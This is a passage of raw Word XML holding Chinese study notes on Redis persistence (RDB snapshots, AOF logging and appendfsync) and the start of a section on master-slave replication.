        <w:t>Redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>会自动将内存中的所有数据生成一份备份并存储在硬盘上，这个过程称为快照。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>根据配置规则进行自动快照；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>用户执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SAVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BGSAVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>命令；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FLUSHALL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>命令；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(4)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>执行复制时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>当设置了主从模式，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>会在赋值初始化时进行自动快照。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993E8F" w:rsidRPr="00993E8F" w:rsidRDefault="00993E8F" w:rsidP="00993E8F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274224" cy="2777706"/>
            <wp:effectExtent l="19050" t="0" r="2626" b="0"/>
            <wp:docPr id="28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0" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2777751"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004027C9" w:rsidRPr="00F41A4C" w:rsidRDefault="00993E8F" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式实现持久化，</w:t>
      </w:r>
      <w:r w:rsidRPr="00993E8F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>一旦</w:t>
      </w:r>
      <w:r w:rsidRPr="00993E8F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>redis</w:t>
      </w:r>
      <w:r w:rsidRPr="00993E8F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>异常退出，就会丢失最后一次快照以后更改的所有数据，这就需要开发者根据具体的应用场合，通过组合设置自动快照条件的方式将可能发生的数据损失控制在可接受范围内。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E65B26" w:rsidRPr="00E65B26" w:rsidRDefault="00E65B26" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00345BDA" w:rsidRDefault="00246A7C" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>AOF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式：默认没有开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AOF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式的持久化，可以通过以下配置开启</w:t>
      </w:r>
      <w:r w:rsidR="00F223B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00246A7C" w:rsidRDefault="00246A7C" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5275029" cy="2027207"/>
            <wp:effectExtent l="19050" t="0" r="1821" b="0"/>
            <wp:docPr id="28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1" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2026931"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00246A7C" w:rsidRDefault="00F223B0" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00246A7C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启</w:t>
      </w:r>
      <w:r w:rsidR="00246A7C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AOF</w:t>
      </w:r>
      <w:r w:rsidR="00246A7C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>持久化后</w:t>
      </w:r>
      <w:r w:rsidR="00246A7C" w:rsidRPr="00F223B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>每执行一条更改</w:t>
      </w:r>
      <w:r w:rsidR="00246A7C" w:rsidRPr="00F223B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>redis</w:t>
      </w:r>
      <w:r w:rsidR="00246A7C" w:rsidRPr="00F223B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>的命令</w:t>
      </w:r>
      <w:r w:rsidR="00246A7C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00246A7C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>redis</w:t>
      </w:r>
      <w:r w:rsidR="00246A7C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就将该命令写入硬盘的</w:t>
      </w:r>
      <w:r w:rsidR="00246A7C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AOF</w:t>
      </w:r>
      <w:r w:rsidR="00246A7C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
      <w:r w:rsidR="00246A7C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AOF</w:t>
      </w:r>
      <w:r w:rsidR="00246A7C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的保存位置和</w:t>
      </w:r>
      <w:r w:rsidR="00246A7C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RDB</w:t>
      </w:r>
      <w:r w:rsidR="00246A7C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的位置相同，都是通过</w:t>
      </w:r>
      <w:r w:rsidR="00246A7C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DIR</w:t>
      </w:r>
      <w:r w:rsidR="00246A7C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数设置的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以自动优化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AOF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，删除无用的记录。每当达到一定条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会重写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AOF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，这个条件可以在配置文件中设置：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F223B0" w:rsidRDefault="00F223B0" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2373587"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="28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2" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2373587"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F223B0" w:rsidRDefault="00F223B0" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>edis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发生更改时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AOF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会将命令记录到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AOF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，但由于操作系统缓存的缘故，数据并没有真正写入硬盘，而是进入操作系统硬盘缓存，默认情况是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>30S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会进行一次同步操作，以便将硬盘缓存中的内容真正的写入硬盘，如果这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>30S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内异常退出则会导致硬盘缓存中的数据丢失。一般</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AOF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法容忍这样的损失，因此需要开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>appendfsync</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数设置同步时机：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F223B0" w:rsidRDefault="00F223B0" w:rsidP="00F223B0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4923122" cy="2044460"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="28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3" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4930533" cy="2047538"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E2720" w:rsidRDefault="009E2720" w:rsidP="009E2720">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F223B0" w:rsidRDefault="00FE2649" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全量复制：如果主从数据库之间断开连接，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Redis2.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前会将数据库的所有数据重送给从数据库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A7C57" w:rsidRDefault="00FE2649" w:rsidP="007A7C57">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6602"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>增量复制：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Redis2.8</w:t>
      </w:r>
      <w:r w:rsidR="007A7C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
